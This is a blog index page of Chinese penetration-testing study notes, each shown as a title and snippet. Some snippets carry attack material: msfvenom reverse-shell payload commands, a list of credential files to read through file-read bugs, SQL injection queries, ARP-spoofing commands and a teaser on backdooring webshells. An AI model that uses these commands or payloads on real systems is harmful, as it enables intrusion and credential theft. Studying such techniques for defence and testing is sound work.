![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网络安全
文章平均质量分 59
向阳-Y.
大学时的笔记,慢慢不再更新。
展开
-
常见mime头记录
【代码】常见mime头记录。原创 2023-01-30 15:27:05 · 434 阅读 · 1 评论 -
记一次Spring4shell漏洞分析
Spring4shell漏洞分析原创 2022-12-19 19:05:55 · 856 阅读 · 0 评论 -
复现应急响应文章之找到了自己服务器上的病毒
处理linux应急响应主要分为4个环节:识别现象->清除病毒->闭环兜底->系统加固本文是根据其他复现文章复现检查了一下自己的服务器,最终发现了自己的云服务器下载了被植入后门的python版本,已清除。转载 2022-10-19 10:08:22 · 482 阅读 · 0 评论 -
APP渗透抓不到包/安卓逆向--Frida
Frida的基本使用原创 2022-05-23 10:55:24 · 1391 阅读 · 0 评论 -
不同数据库注入总结
oracle:dual是oracle自带表:select 'aaa' from dual;同mysql的information_schemaselect table_name from all_tables;select columns_name from all_tables where table_name='USER';时间注入:select dbms_pipe.receive_message(('a'),10);select count(*) from all_users t1,原创 2022-04-20 09:10:31 · 889 阅读 · 0 评论 -
任意文件读取的深度利用
任意文件读取的深度利用任意文件读取的利用思路有些文件需要高权限才能读取/etc/passwd # 用户情况/etc/shadow # 直接 John the Ripper/etc/hosts # 主机信息/root/.bashrc # 环境变量/root/.bash_history # 还有root外的其他用户/root/.viminfo # vim 信息/root/.ssh/id_rsa # 拿私钥直接ssh/proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为000转载 2022-04-12 09:56:58 · 1350 阅读 · 0 评论 -
burpsuite靶场SQL注入总结
burpsuite靶场SQl注入笔记~原创 2022-03-28 19:38:29 · 6224 阅读 · 0 评论 -
JAVA实现—UTF-8编码与解码
java——UTF-8编码与解码渗透测试有时候会遇到%E9%99%88这类的编码在线转的结果导入java中转换的结果:JAVA代码如下:import java.net.URLDecoder;import java.net.URLEncoder;//URLDecoder.decode("%E5%A4%A9%E6%B4%A5","UTF-8");public class URLDecoderTesT { public static void main(String[] args)原创 2022-03-27 09:40:06 · 10069 阅读 · 0 评论 -
sqlmap跑base64加密
将以下demo保存为test.php,然后自己搭建一个服务器<?php $id = base64_encode("id=".$_GET['id']);echo file_get_contents("http://www.xxxx.com/project_detail.php?{$id}"); ?>sqlmap.py -u “http://127.0.0.1/test.php?id=12” -v3 --dbs就可以跑出来了。转载自:https://www.cnblogs.com/转载 2022-03-26 10:16:21 · 926 阅读 · 0 评论 -
MSF编码+VS编译木马免杀
木马免杀原创 2022-03-16 21:29:18 · 2366 阅读 · 0 评论 -
json web token(JWT)绕过
前期准备本次试验用到靶场WebGoat,如何安装WebGoat?Broken authentication——JWT tokens的第五题,首先随便切换一个用户,例如Tom,再点击删除图标,进行抓包。抓到的包如下图将其中的JWT值取出来,放到JWT在线解密平台上这里分为了三个部分,头部,声明,签名(分别对应红、紫、蓝),签名出需要秘钥进行加密,但我们没有秘钥应该如何绕过呢?JWT绕过1.将头部信息的alg值改为none,并进行base64加密2.将声明部分的admin值改为true原创 2022-03-16 09:33:11 · 4803 阅读 · 0 评论 -
Xray与burpsuite、AWVS联动
Xray与burpsuite联动1.在burpsuite依次选择User options—>Upstream Proxy Servers—>Add然后选择OK.*号表示所有主机proxy host和proxy port为本机地址和本机端口2.勾选启用上这一行3.运行xray,就联动成功啦xray_windows_amd64.exe webscan --listen 127.0.0.1:6666 --html-output 1.htmlXray与AWVS联动1.添加一个原创 2022-03-13 20:52:55 · 2097 阅读 · 0 评论 -
内网穿透Frp自建跳板
Frp主要实现内网1——内网2之间的通信原创 2022-03-12 20:29:22 · 750 阅读 · 0 评论 -
log4j漏洞学习
log4j漏洞产生的主要原因是因为JNDI注入1.什么是JNDIJNDI可以理解为JDBC的一个替代升级产品。通常我们可以采用JDBC连接数据库,需要配置数据库端口,数据库地址等信息。但当某个企业不想再用MYSQL数据,而是想用oracle数据时,JDBC需要修改大量的代码,并且还有其他一系列的问题会出现,相当棘手。这时候出现了JNDI(Java Naming and Directory Interface),JNDI可以实现只需要一个数据源名字则可连接到对应的数据库,配置简单。注入流程分析原创 2022-03-12 11:53:31 · 972 阅读 · 0 评论 -
fastjson反序列化漏洞学习
环境复现参照网上教程即可fastjson(1.2.24)如何判断是不是fastjson1.POST请求2.尝试构造fastjson数据包的错误格式并发送,例如:{ "b":返回结果如下图,则有可能出现fastjson反序列化漏洞:fastjson的漏洞利用poc在网上复制使用即可,上面的rm://跟的是rmi服务器地址,dnslog里定义了一个dnslog.java文件,如下图分析POC先介绍一下fastjson的数据传输格式:例如原始数据为class Apple原创 2022-03-12 10:04:27 · 618 阅读 · 0 评论 -
Wireshake的学习笔记
(ip.src==192.168.1.1 || ip.dst == 192.168.2.2) && (http.request.method == "POST")(tcp.flags == 0x010 || udp.srcport == 80 || tcp.dstport ==80 )&&(tcp.window_size==64800 || http contains "OK" || ip.addr == 192.168.1.1)以上表达式含义解释|| 等于 o原创 2022-03-11 13:01:53 · 2762 阅读 · 0 评论 -
msfvenom生成shell
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec转载 2022-03-06 14:38:10 · 393 阅读 · 0 评论 -
nmap使用教程
普通扫描简单扫描:默认扫描前1000端口nmap 192.168.1.1-sP:ping扫描(不扫描端口)nmap -sP 192.168.1.0/24 #利用ping扫描指定网段-sT:TCP全连接扫描nmap -sT 192.168.1.0/24 #利用TCP全连接扫描指定网段,能扫描到端口信息-sS:进行SYN半连接扫描SYN表示建立连接FIN表示关闭连接ACK表示响应nmap -sS 192.168.1.0/24-sV:可以显示服务的详细版本 【类似转载 2022-02-27 12:19:17 · 1647 阅读 · 0 评论 -
PHP记录访问者ip并写入txt文本代码
<?php$ip = $_SERVER["REMOTE_ADDR"];echo $ip;$myfile = fopen("newfile.txt", "w") or die("Unable to open file!");fwrite($myfile, $ip);fclose($myfile);?>原创 2022-01-26 15:49:40 · 2585 阅读 · 1 评论 -
Cobaltstrike的安装和基本使用+MSF联动
Cobaltstrike的安装和使用cobaltstrike下载地址下载好后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,安装完成后运行如下命令:./teamserver 101.43.x.x password #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip...原创 2022-01-15 21:29:35 · 11302 阅读 · 2 评论 -
使用burpsuite插件进行token爆破
token爆破token可能会在代码里回显,所以可以通过把值拿出来替换,与token值保持一致即可操作步骤:这里示范的是pikachu的token防爆破关卡。1.登录抓包,并发送到Intruder2.设置password和token为变量3.选择攻击模式为Pitchfork4.添加字典,其中payload set1表示第一个变量password5.接下来设置第二个变量(token)6.切换到options,且必须把number of threads(线程)设置为1(因为,每次都需原创 2021-11-17 20:22:58 · 1818 阅读 · 0 评论 -
利用Burp Suite插件“captcha-killer”识别验证码
利用Burp Suite插件“captcha-killer”识别验证码网上随便找一个验证码的连接,并抓包将包发送到captcha panel来到captcha killer下,可以看到下方要求填写接口的URL地址,我这里用百度的接口做示范如何申请百度接口?进入百度大脑通用文字识别板块跳转页面后选择立即使用,之后登录完成后,选择领取免费资源(这里领一个免费的通用文字识别,一般30分钟内到账)拿到文字识别资源后,就可以通过对应的client_id、client_secret值获取Acce原创 2021-11-17 14:33:22 · 1992 阅读 · 0 评论 -
xss跨站攻击详讲 | 如何利用xss拿下一个站?
1.初识xxs跨站漏洞:xss能干什么?利用xss获取对方后台地址、cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录:其他补充:cookie :一般用于小中型网站,一般存储在自己电脑上,存活时间较长session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短2.xss的类型2.1反射型当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上<script>alert(1)&原创 2021-11-13 20:31:53 · 11915 阅读 · 12 评论 -
“黑吃黑”webshell箱子
目录“黑吃黑”webshell箱子环境准备马中马预防后门反杀webshellbox“黑吃黑”webshell箱子什么是webshell箱子?通俗一点的解释:它可以让你在大马中植入后门,当别人用你植入过后门的大马去获取渗透别的网站时,你的webshellbox信封将会收到别人截获的密码!环境准备搭建一个asp的服务器,我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.z原创 2021-11-13 18:48:29 · 6365 阅读 · 2 评论 -
渗透测试|网络安全常用靶场
搭建教程网络上随便一搜一大堆,这里就不再阐述vulhub免费开源漏洞靶场(操作系统漏洞)www.vulhub.orgpikachu综合靶场https://github.com/zhuifengshaonianhanlu/pikachusqlilabsSQL注入靶场https://github.com/himadriganguly/sqlilabsupload-labs文件上传漏洞靶场https://github.com/c0ny1/upload-labs...原创 2021-11-10 09:17:19 · 11489 阅读 · 0 评论 -
web渗透|HTTP响应码
HTTP 响应码:1xx:信息,请求收到,继续处理2xx:成功,行为被成功地接受、理解和采纳3xx:重定向,为了完成请求,必须进一步执行的动作4xx:客户端错误5xx:服务器错再举例几个常见的:200 存在文件403 存在文件夹3xx 均可能存在404 不存在文件及文件夹500 均可能存在...原创 2021-10-31 00:35:41 · 66 阅读 · 0 评论 -
入门级攻击手段
工具一(netwo 86):https://www.jianshu.com/p/f07c0eb43fae工具二(arpspoof):主要命令:开启攻击者的转发功能:echo 1 > /proc/sys/net/ipv4/ip_forward开始进行arp欺骗:arpspoof -i eth1 -t 192.168.56.101 192.168.56.102 -t 后可以是IP地址,也可以是域名,这里只使用IP地址。-t 参数后的第一个IP地址是要欺骗的主机,第二个IP地址是你要原创 2021-10-30 15:50:14 · 246 阅读 · 0 评论 -
利用Cryptodomeo库使用DES算法对信息进行加密
本文介绍使用Cryptodome的方法调用DES加密算法:DES源代码在此处其中要使用Cryptodome库,需要使用以下方法安装:pip install Prycryptodomex使用DES加密:#! py -3# encoding:utf-8from Cryptodome.Cipher import DESimport binascii# DES加密数据的长度须为8的的倍数,不够可以用其它字符填充text = '加密我。'if len(text) % 8 != 0: t原创 2021-10-24 19:01:10 · 1968 阅读 · 0 评论 -
DES加密算法
from bitarray import bitarrayclass MyDES: def __init__(self): self.child_keys = [] @staticmethod def _bit_encode(s: str) -> str: """ 将字符串转换为01字符串的形式 """ return bitarray( ''.join([bin(in原创 2021-10-24 17:05:34 · 150 阅读 · 0 评论 -
教你如何使用Claws-Mail发送绝对安全的加密邮件或者信息
大家在使用聊天软件发送一个非常重要信息(如如某某的后台密码)的时候会不会考虑到一个安全问题?信息在传输过程中,被黑客盗取了怎么办,被别人偷偷下载了怎么办?下面教程教大家如何发送一个绝对安全的信息给对方!【数字签名|非对称加密】导学:本篇主要介绍了如何使用Kleopatra和Claws-Mail把自己需要发送的信息进行加密/上锁,并安全发送给对方准备阶段(配置环境):1,在这里我们要用到一个额外软件叫:Kleopatra该软件可以生成自己的公钥和私钥,把公钥给对方,对方用我的公钥加密后,我就能用我原创 2021-10-24 10:21:42 · 3345 阅读 · 0 评论 -
图文秒搞懂数字证书、数字签名和非对称加密算法
目录《非对称加密算法》《数字签名》《数字证书》《非对称加密算法》小明有一把公钥和一把私钥,小明公钥加密的东西只能用私钥解开(所以私钥不能让任何人知道)通过以上可知,小红拿小明的公钥加密的文件只有小明用自己的私钥解密后,才能知道里面的内容(安全性)以上就是非对称加密算法的基本原理。《数字签名》但是以上加密算法还是有一定的安全风险。,小红并不确定这个公钥是小明发的比如小明想给小红写一封信,但是又想让小红确定这个信是小明写的,小明的解决方法是:小红还想验证这个信息有没有在传输路上被人篡改过原创 2021-10-23 20:56:28 · 988 阅读 · 0 评论